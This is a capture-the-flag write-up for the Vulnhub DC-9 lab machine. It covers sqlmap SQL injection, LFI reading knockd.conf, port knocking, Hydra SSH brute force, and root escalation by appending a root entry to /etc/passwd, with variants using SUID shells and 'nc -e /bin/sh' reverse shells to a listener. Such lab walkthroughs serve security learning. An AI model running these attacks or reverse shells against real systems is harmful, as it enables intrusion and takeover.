Vulnhub - DC-9 writeup
Nmap
Only HTTP service is running. So a simple start, lets begin enumerating HTTP service.
HTTP
So this looks like a drupal website but it’s actually not. It’s just simple php website.
I started to look around but couldn’t find anything interesting. I mean there wasn’t any URL parameter to test for sql or anything as such.
On the search page there is a box to enter search query, I decided to test that for the SQLi.
Send any query via box and capture that request using burp, then save that query to a file called sql.txt
and pass that text file to sqlmap
.
This is how the sql.txt file looked like:
Now we can run sqlmap -r sql.txt
we can see that it’s vulnerable to SQLi. So now we can list all the databases and see if we can find any login credentials.
➜ sqlmap -r /home/mzfr/sql.txt --dbs
Then I ran
➜ sqlmap -r /home/mzfr/sql.txt -D Staff --dump
a9cb430b8b1d44c3476234ef3f779442:admin
We can crack the hash using hashkiller.
so now we have admin credentials admin:truck
(transorbital1
) I was able to login using those but there wasn’t much we could do after login because the only new thing that admin could do was add records
.
NOTE: The password for admin would be transorbital1
, the first draft of the VM had truck as the password but for the final version the password transorbital1
So then I decided to dump the users
db using sqlmap
➜ sqlmap -r /home/mzfr/sql.txt -D users --dump
Now the issue is that there is no way to login even though we have the credentials, so I started exploring more. One thing I noticed after we login as admin
we get this error in the footer section stating File does not exist
this gave me a hint about usage of include()
in PHP which might be exploitable for LFI.
But the issue was that I didn’t see any parameter in the URL so I decided to test it with the most common/obvious one i.e file
.
Since we have the LFI we need to find something that might either allow us a reverse shell or may guve some more information about what to do with those credentials.
After looking around I found out that there was knockd.conf
present meaning we can read that using LFI and then use those credentials to login via SSH.
If we visit IP/manage.php?file=../../../../../../../../etc/knockd.conf
we can see the content of the knockd.conf
and the sequence to open SSH is 7469,8475,9842
You can use anything to do knock I usually prefer this simple one liner
➜ for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.56.144; done
Now we have the SSH open we just need to narrow down the correct credentials for SSH login. For that I made a file named users.txt
that had username
and password.txt
that had all the passwords. Then I used hydra to check if any of those were valid SSH logins.
I got hit on 3 of them:
chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee
Privilege escalation
I used the janitor user account to login and in his home directory I found a hidden directory named .secrets-for-putin
.
And in that directory there was a file named passwords-found-on-post-it-notes.txt
I then took all these password and placed them in the password.txt
I created previously and re-started the ssh attack and then I found a new valid password which was for user fredf
I su
to fredf
account and then checked it’s sudo rights
and it’s
We see we can run /opt/devstuff/test/test
. So I executed that but I couldn’t see any output or anything. Then I found file named test.py
in /opt/devstuff/test/
and it had the following code:
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
We see that it take 2 arguments, first one is the file it reads and second one the file it rights to. Now the exploit here is that it’s appending
data to the script as root
, meaning we can make a file that have something like /bin/bash
or nc -e /bin/sh [IP] [PORT]
. Also there are the following easy ways:
- Append to /etc/sudoers
- Append an entry to /etc/passwd
The best would be to add an entry to /etc/passwd
with a new root
user whose password would be password
.
echo 'mzfr:sXuCKi7k3Xh/s:0:0::/root:/bin/bash' > /tmp/hack
sudo ./test /tmp/hack /etc/passwd
su mzfr
Password: toor
The very first echo command makes a user name mzfr
with password toor
. Then we run the script as root to add that new entry from /tmp/hack
to /etc/passwd
and then we switch to that account.
If you are interested in how this machine was supposed to end on it’s 1st and 2nd beta testing phase
then you can continue to read.
Privilege Escalation (Test 2)
This is how the privilege escalationw as supposed to be in Test 2
After becoming fredf
we check his sudo right:
We see we can run /opt/devstuff/test/test
. So I executed that but I couldn’t see any output or anything. Then I found file named test.py
in /opt/devstuff/test/
and it had the following code:
#!/usr/bin/python
bashCommand = "/bin/sh"
import subprocess
process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
If this is the code that test
binary is running then that means we will have to some how do some redirects to be able to see the output. So we can do something like:
cp /bin/sh /tmp/shell
chmod 4755 /tmp/shell
Then go to /tmp
and run ./shell -p
to get a proper root shell.
Privilege Escalation (Test 1)
This is how the privilege escalationw as supposed to be in Test 1
I used the janitor user account to login and in his home directory I found a hidden directory named .secrets-for-vlad
And in that directory there was a file named passwords-found-on-post-it-notes.txt
I then took all these password and placed them in the password.txt
I created previously and re-started the ssh attack and then I found a new valid password which was for user scoot
I su
to scoots
account and then checked it’s sudo rights
and it’s allowed to run mail
or nc
as root.
So we can get root shell in the following manner:
using mail
sudo mail --exec='!/bin/sh'
using nc
sudo nc -e /bin/sh 192.168.56.1 4444
and you’ll have root shell on your listener.
It was nice machine, initial foothold might be a bit confusing in the starting as the website exactly looks like a drupal but once you figure out the SQLi and have figure out that we need to read knockd.conf
using LFI, it’s all easy that point.
Fun Fact: LFI wasn’t the part of the machine during first 2 test, it was added on the final version.
Thanks to @DCUA7 for making this VM and letting me beta test it ;-) Sad part is that this will be the last CTF in the DC series 😢
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”. And if you’d like to support me considering donating 😄